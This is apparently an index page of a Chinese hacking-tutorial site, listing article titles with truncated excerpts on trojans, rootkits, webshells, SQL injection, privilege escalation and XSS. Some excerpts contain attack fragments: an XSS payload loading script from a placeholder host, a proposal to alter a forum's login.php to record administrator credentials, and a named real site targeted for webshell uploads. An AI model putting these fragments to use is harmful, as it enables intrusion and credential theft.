安全教程

OGeek|极客世界-中国程序员成长平台 › 门户 › 安全›安全教程

RSS

后门程序技术知识全面讲解

什么是后门程序　　后门程序又称特洛伊木马，其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会感染其他电脑 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：244 | 回复：0
菜鸟必懂的木马连接原理

目前常见的木马有三种正向连接木马反弹连接木马收信木马　　正向连接木马,所谓正向，就是在中马者在机器上开个端口，而我们去连接他的端口。而我们要知道他的IP，才能够连接他。123就是他机器上开的端口　　 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：228 | 回复：0
教初学者如何把执行文件内存中的DLL的代码全部保存下来

有时，有些软件有保护，看不到他程序内部是怎么一个样,如果想简单的把他的内存保存下来！我写了一个简单的函数，调用一下就可以把DLL和EXE的内存里的信息全部导到文件里！到时再慢慢查吧！ uses TlHelp32; ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：229 | 回复：0
教你如何应对DDoS险滩

随着网络带宽的增加和多种DDoS黑客工具的发布，各种DDoS攻击软件都可以很轻松地从互联网上获得。于是，DDoS拒绝服务攻击的实施越来越容易，DDoS攻击事件的上升趋势给飞速发展的互联网带来了重大的安全威胁。商业竞争 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：221 | 回复：0
拿下DVBBS php官网详细过程（图）

注意:文章已经发表在2008第7期《黑客手册》上,转载请注明出处。几个月前，DVBBS php2.0暴了一个可以直接读出管理员密码的sql注入漏洞，当时这个漏洞出来的时候，我看的心痒，怎么还会有这么弱智的漏洞，DVBBS php ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：213 | 回复：0
教你如何通过Mysql弱口令得到系统权限

很早网上就有了用mysql弱口令得到webshell教程，但是这次我要说的不是得到webshell，而是直接得到系统权限，看清楚了，是“直接”得到！首先，我简单说一下mysql弱口令得到系统权限得过程：首先利用mysql脚本上 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：225 | 回复：0
教你教菜鸟清除SQL server日志的方法

这个问题很多人受到了困扰，日志动辄十几个g 问：SQLServer中的事务日志应该怎样压缩和删除？答：具体方法有3种。方法一: 第一步： backup log database_name with no_log或者 backup log database_ ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：220 | 回复：0
Rootkit隐形技术入门详解

一、综述本文将引领读者打造一个初级的内核级Rootkit，然后为其引入两种简单的隐形技术：进程隐形技术和文件隐形技术。同时，为了让读者获得rootkit编程的相关经验，我们顺便介绍了rootkit的装载、卸载方法，以及 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：233 | 回复：0
教你如何用非主流方式抓鸡（图）

事先声明一下,其实这个是没有什么技术含量的,只是一个思路. 第一步:找一个可以观看的SWF文件　　第二步:用SmartSWF.EXE'把这个SWF文件转换成EXE文件,当然也可以用其他的软件　　第三步:打开南域剑盟捆 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：243 | 回复：0
教你如何突破IE安全限制获取iframe子框架内的本地cookie（图）

我的测试环境是： IE 7 (7.0.5730.13) 以下所有的内容全部经过我在IE7中测试，是真实有效的结果。 Iframe的限制: 因为iframe这个玩意比较特殊，所以浏览器对它一般都有一些限制。首先父窗口不能控制子窗 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：225 | 回复：0
暴破SAM文件的提权法

通过WEBSEHLL，获取SAM文件，利用LC4，LC5等系列帐户HASK破解工具，破解出系统密码，利用3389远程连接，提升权限什么是SAM文件？简单来说SAM文件，就是保存系统中帐号的资料的文件，当然，也包括密码 SA ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：231 | 回复：0
PcAnywhere12提权方法

在早期的入侵提权中，我们经常可以看到使用利用安装PcAnywhere的服务器下载cif文件，然后使用明小子或者其他专用的密码读取工具进行读取控制密码的提权方法。这个应该算是PcAnywhere的一个硬伤了。而通常这个文件存 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：225 | 回复：0
DNS协议欺骗攻击技术的攻防知识

你是否遭遇过这样的情况?当你在浏览器中输入正确的URL地址，但是打开的并不是你想要去的网站。它可能是114的查询页面，可能是一个广告页面，更可能是一个刷流量的页面，甚至是一个挂马的网站。如果你遇到了上述情况 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：231 | 回复：0
分析黑客使用Web进行攻击的10大原因

1．桌面漏洞 Internet Explorer、Firefox和Windows操作系统中包含很多可以被黑客利用的漏洞，特别是在用户经常不及时安装补丁的情况下。黑客会利用这些漏洞在不经用户同意的情况下自动下载恶意软件代码也称作隐 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：229 | 回复：0
如何让进程在Linux后台运行

在Linux中，如果要让进程在后台运行，一般情况下，我们在命令后面加上即可，实际上，这样是将命令放入到一个作业队列中了： $ ./test.sh 17208 $ jobs -l 17208 Running ./test.sh 对于已经在前台执行的 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：226 | 回复：0
木马保护生成

这几天研究了一下木马保护生成，现在给各位菜鸟分享一下。很多人做木马生成器但是不想让别人改或研究生成后的木马这就需要对生成出的木马进行保护。保护的手段一般是加壳或者加密。过程一般是将配置信息写入 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：206 | 回复：0
公开个Nday（图）

08046估计国内很多小牛大牛搞出来了.最早知道有这么个洞大约是在今年三四月份,听某牛man说有个系统默认支持的图片格式的洞,结果四月份出了个MS08-021,POC也有公开的,当时以为传言指的就是这两个鸡肋.没想到8月份MS又 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：204 | 回复：0
教你让网马原代码隐藏的方法

网马再怎么加密,都有可能被反加密的可能,为了更好保护自己的代码,看看这办法,但这办法对付不了抓包分析,数据包抓取也是没办法的目的:查看源代码没有内容,查看缓冲区也没内容 1.asp文件写法 %'禁止缓 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：221 | 回复：0
黑客必懂的木马连接原理

目前常见的木马有三种正向连接木马反弹连接木马收信木马　　正向连接木马,所谓正向，就是在中马者在机器上开个端口，而我们去连接他的端口。而我们要知道他的IP，才能够连接他。123就是他机器上开的端口　　 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：229 | 回复：0
教你如何解决无法显示验证码的问题

晚上检测一个站的时候，猜解出了密码，扫出了后台，可验证码就是无法显示，难道管理员故意弄的？不太可能吧？于是上网一搜，没想到还真找到了解决的方法。我的是Vista Ultimate，部分XP SP2也会有这个问题。好了，不 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：200 | 回复：0
Asp脚本木马技术

现在很多的站点，为便于建站和后台管理，都使用ASP动态程序。但这也为整个站点的安全带来很大隐患，现在典型的网站攻击就是通过植入ASP木马，从而得到系统的控制权。早期的asp木马一般有数个文件，随着asp木马的易用 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：216 | 回复：0
XSS攻击防御技术

1 背景知识 1.1 什么是XSS攻击 XSS攻击：跨站脚本攻击（Cross Site Scripting），为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：231 | 回复：0
教你如何制作VB的P-Code调试器

P-Code简介术语P-Code既不是一个新名词也不是Microsoft的发明，P-Code只是简单地被解释执行的伪指令。因此，我们并不需要通过什么复杂的专业词汇来描述它。P-Code可以被认为是一种普通的机器级代码（我们的微处 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：240 | 回复：0
教你破解xp系统administrator权限

作者：Awolf 首发：AwolfS Security Blog 一．事情起因那天满头大汗的把哥哥的电脑拿回来了。可是回到家一进入系统要密码，问了n次，密码都是错的。（忘记了）又加上我用usb键盘，用ghost系统盘破解破解程序 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：230 | 回复：0
教你拿站和找关键词思路（图）

目标这个站 http://www.chinaweibo.cc/upfile_Other.asp 这个漏洞我刚看了看成功率10%左右吧我觉得这个数字就不低了毕竟是批量拿webshell~~~ 关于上传漏洞的帖子和教程论坛有好多相信大家都会了我步骤省略点 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：212 | 回复：0
成为黑客的几个必备技能

黑客的精神态度是很重要的，但技术则更是重要。黑客的态度虽然是无可取代，随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。 1、黑客的精神态度是很重要的，但技术则更是重要。黑客的态度虽然是无可取 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：217 | 回复：0
教你用PHPWIND得到管理员密码的方法

有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到他密码咋办? 在登录文件做手脚啊...我来贴一个我修改的. login.php里面替换掉对应的部分就OK了. CODE: if($action==login){ /*记录他的问题和答案修改 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：222 | 回复：0
教你关于AJAX的注入（图）

AJAX可以让数据在后台无声无息地进行，假如有办法让你的JS脚本与这个AJAX模块在同域内的话，那可以使用这个XSS来完成二次攻击，并且可以通过XHR对象的status属性来判断返回结果的正确与否。GET型的AJAX，直接构造URL ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：224 | 回复：0
黑客狙击Oracle系统的八大常用方法

Oracle的销售在向客户兜售其数据库系统一直把它吹捧为牢不可破的，耍嘴皮子容易，兑现起来可就不那么容易了。不管什么计算机系统，人们总能够找到攻击它的方法，Oracle也不例外。本文将和大家从黑客的角度讨论黑客是 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：214 | 回复：0
黑客域名劫持攻击的基本步骤

近期发现adobe.com,internet.com,nike.com,等等著名站点都分分遭受到攻击，但攻击者所使用的技术并不是以往所使用的入侵WEB服务器，更改主页的惯用手法，攻击者使用的是一种域名劫持攻击？攻击者通过冒充原域名拥有 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：214 | 回复：0
教你如何在XSS中再插JS

img src=javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}/img 字符过滤怎么办?用Encode加密后就无敌了~ 未加密前： img src='#' X ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：217 | 回复：0
DNS欺骗技术教程

定义： DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。原理：如果可以冒充域名服务器，然后把查询的IP地址设为攻击者的IP地址，这样的话，用户上网就只能看到攻击者的主页，而不是用户想要取得的网站的主页了， ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：214 | 回复：0
后门程序技术知识深解

后门程序又称特洛伊木马，其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会感染其他电脑。　　后门是一种登 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：219 | 回复：0
用ASP脚本命令重启服务器

家知道直接使用ASP是不能够重启服务器的，这时我们需要制作一个组件来实现功能，ASP通过这个组件调用系统API，然后按照不同的重启和关机方式进行操作！下面先说COM的制作，在VB中新建一工程，当然是Aceiv ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：210 | 回复：0
Rootkit隐形技术教程(图)

一、综述本文将引领读者打造一个初级的内核级Rootkit，然后为其引入两种简单的隐形技术：进程隐形技术和文件隐形技术。同时，为了让读者获得rootkit编程的相关经验，我们顺便介绍了rootkit的装载、卸载方法，以 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：209 | 回复：0
Unicode的消息介绍（图）

基本知识字节和字符的区别 Big Endian和Little Endian UCS-2和UCS-4 UTF-16和UTF-32 UTF-16 UTF-32 UTF-8 基本知识介绍Unicode之前，首先要讲解一些基础知识。虽然跟Unicode没有直接的关系， ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：222 | 回复：0
浅谈文件捆绑技术方式（图）

随着恶意代码的发展越来越广泛，以及其强大的破坏性和更多样的传播方式，给人们带来更多的危害。叶子在前面的文章中已经跟大家谈过恶意代码的基本概念以及对其的研究分析流程。在本篇文章中叶子将给大家介绍一下恶意 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：211 | 回复：0
教你如何用ISAPI_Rewrite做IIS防盗链

“盗链”的定义是：此内容不在自己服务器上，而通过技术手段，绕过别人放广告有利益的最终页，直接在自己的有广告有利益的页面上向最终用户提供此内容。常常是一些名不见经传的小网站来盗取一些有实力的大网站的地 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：266 | 回复：0
黑客技巧：利用Log备份获取Webshell

dbowner通过注射得到一个shell应该不是什么难事情了，比较麻烦的是就算利用增量备份，仍然有很多不确定的因素，如果之前别人有过什么错误的写入信息，可能备份出来得到的还是一些不能用的500错误，如何能够提高成功 ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：216 | 回复：0
教你两句话动网8.20的后台被拿下

dvbbs8.2漏洞补下载地址: http://bbs.dvbbs.net/dispbbs.asp?boardid=8;Id=1519564 紧急安全补丁0530 dvbbs8.2漏洞的产生 login.asp 这个文件的97行Function Dvbbs_ChkLogin 开始有以下代码： username=trim ...……

作者：菜鸟教程小白 | 时间：2022-2-6 13:16 | 阅读：219 | 回复：0